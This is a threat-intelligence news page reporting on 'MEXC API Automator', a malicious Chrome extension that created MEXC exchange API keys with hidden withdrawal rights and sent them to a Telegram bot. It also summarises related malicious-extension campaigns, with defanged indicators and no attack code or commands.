Malicious Chrome Extension Exfiltrates MEXC API Keys via Telegram for Account Takeover
Security researchers reported a malicious Google Chrome extension, MEXC API Automator (pppdfgkfdemgfknfnhpkibbkabhghhfh), masquerading as a trading-automation tool for the MEXC cryptocurrency exchange. Published to the Chrome Web Store on 2025-09-01 by an actor using the alias "jorjortan142", the extension targets users who visit MEXC’s API key management page (/user/openapi) and runs a content script (script.js) inside the already-authenticated browser session to create new API keys.
The extension is designed to enable withdrawal permissions on the newly created keys while hiding that capability in the UI, then exfiltrates the API key and secret to a hardcoded Telegram bot controlled by the attacker. With these credentials, the actor can take programmatic control of affected accounts to execute trades and automate withdrawals, potentially draining balances reachable via MEXC. Socket stated the extension remained live on the Chrome Web Store at the time of reporting and that they notified Google; The Hacker News amplified the findings and noted the extension had limited observed downloads but could still enable direct financial theft from compromised accounts.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
4 events from the most recent confirmed update back to the earliest known activity.
Reports confirm extension remained live on Chrome Web Store
Follow-up reporting stated that the malicious extension was still available on the Chrome Web Store at the time of disclosure, with one report noting it had 29 downloads. Researchers warned that stolen API keys could continue to provide account access even after the extension was removed unless the keys were revoked.
Socket links campaign to 'SwapSushi' infrastructure and notifies Google
In its report, Socket said it had flagged the extension as malware and notified Google, while also linking the publisher handle 'jorjortan142' to 'SwapSushi'-branded social accounts, a Telegram bot, and related infrastructure. Researchers also noted Russian-language code comments, suggesting a Russian-speaking developer, though without firm country-level attribution.
Socket identifies extension stealing MEXC API keys and enabling withdrawals
Socket's Threat Research Team discovered that the extension automatically created new MEXC API keys in logged-in browser sessions, enabled broad permissions including withdrawals, hid the withdrawal permission in the UI, and exfiltrated the access key and secret to a hardcoded Telegram bot. The stolen credentials could let attackers trade and withdraw funds without needing passwords or bypassing 2FA.
Malicious 'MEXC API Automator' extension published to Chrome Web Store
A Chrome extension named 'MEXC API Automator,' published by 'jorjortan142,' was added to the Chrome Web Store while posing as an automation tool for the MEXC cryptocurrency exchange. It was later identified as malware designed to abuse authenticated MEXC sessions.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
3 references tracked. Mallory keeps watching after this page renders.
Malicious Chrome Extension Drains Crypto via Secret API Keys
securityonline.info
Open sourceMalicious Chrome Extension Steals MEXC API Keys by Masquerading as Trading Tool
thehackernews.com
Open sourceMalicious Chrome Extension Steals MEXC API Keys for Account Takeover
socket.dev
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Malicious Chrome Extension Exfiltrates Meta Business Data and TOTP 2FA Seeds
Researchers reported a malicious Google Chrome extension, **CL Suite** (publisher **@CLMasters**, extension ID `jkphinfhmfkckkcnifhjiplhfoiefffl`), that targets users of **Meta Business Suite** and **Facebook Business Manager** by masquerading as a tool to scrape business data, remove verification pop-ups, and generate 2FA codes. Although its listing and privacy policy claim sensitive data remains local, analysis found the extension requests broad access to `meta.com` and `facebook.com` and covertly collects **TOTP seeds**, current **2FA codes**, Business Manager “People” exports (CSV), contact lists, and analytics data. The stolen data is exfiltrated to attacker-controlled infrastructure at **`getauth[.]pro`**, with an option to forward the same payloads to an attacker-controlled **Telegram** channel. By capturing TOTP seeds and one-time codes, the extension can effectively **neutralize 2FA**, enabling account takeover when paired with passwords obtained elsewhere (e.g., infostealer logs or credential dumps). The exposure can persist even after uninstall because the attacker retains the exported business intelligence and 2FA seeds; Socket stated it notified Google and flagged the extension for removal, while reporting indicated the extension had a limited user base at the time of analysis.
Mar 21, 2026
108 Chrome Extensions Stole Google Identities and Telegram Sessions
Researchers uncovered a coordinated campaign involving **108 malicious Chrome extensions** on the Chrome Web Store that collectively reached about **20,000 installs** and were published under **five separate publisher identities**. The extensions posed as legitimate tools and games but were tied to a shared command-and-control infrastructure, including `cloudapi[.]stream` and backend systems hosted at `144.126.135[.]238`. Investigators linked the operation through reused code, shared privacy-policy artifacts, common Google Cloud project numbers across **54 OAuth-enabled extensions**, and Russian-language comments, indicating a single operator or centrally managed service. The extensions were found stealing **Google account identity data**, **browsing information**, and **Telegram Web sessions**, while some also injected ads, inserted arbitrary JavaScript into visited pages, stripped security headers from sites such as YouTube, TikTok, and Telegram, or used a startup backdoor to open arbitrary URLs. The most severe sample, **Telegram Multi-account**, reportedly exfiltrated Telegram Web session data every 15 seconds and could enable full account takeover by replacing a victim's local session with attacker-supplied data. Researchers said the infrastructure appeared consistent with a **malware-as-a-service** model and warned that many of the extensions were still live when reported; affected users were urged to remove the extensions and revoke active Telegram Web sessions.
Apr 15, 2026
Malicious Chrome Extensions Used for Social Media Account Hijacking
Security researchers reported multiple **malicious Google Chrome extensions** being used to hijack social media accounts by abusing the trust and permissions granted to browser add-ons. One campaign targeted Meta Business users with an extension named **“CL Suite by @CLMasters”** (`jkphinfhmfkckkcnifhjiplhfoiefffl`) that requested broad access to `meta.com` and `facebook.com` and exfiltrated Facebook Business Manager authentication material and analytics. Analysis indicated the extension captured the **TOTP seed** and current 6-digit 2FA code when users used its built-in “2FA generator,” then sent associated identifiers (e.g., username/email) to attacker infrastructure at **`getauth[.]pro`**, with optional forwarding to Telegram—enabling ongoing generation of valid 2FA codes and increasing the likelihood of high-value ad account takeover. A separate operation hijacked more than **500,000 VKontakte accounts** via five Chrome extensions disguised as VK customization tools (e.g., themes). The extensions manipulated accounts without consent (auto-subscribing victims to attacker-controlled groups, resetting settings periodically, and leveraging VK weaknesses to perform unauthorized actions) and could silently update to receive new malicious code. Researchers attributed the VK-focused activity to a single actor (GitHub alias **“2vk”**), and at least one extension (**VK Styles**) was removed from the Chrome Web Store after being flagged, underscoring the ongoing risk of extension-based compromise even when distributed through official marketplaces.
Mar 21, 2026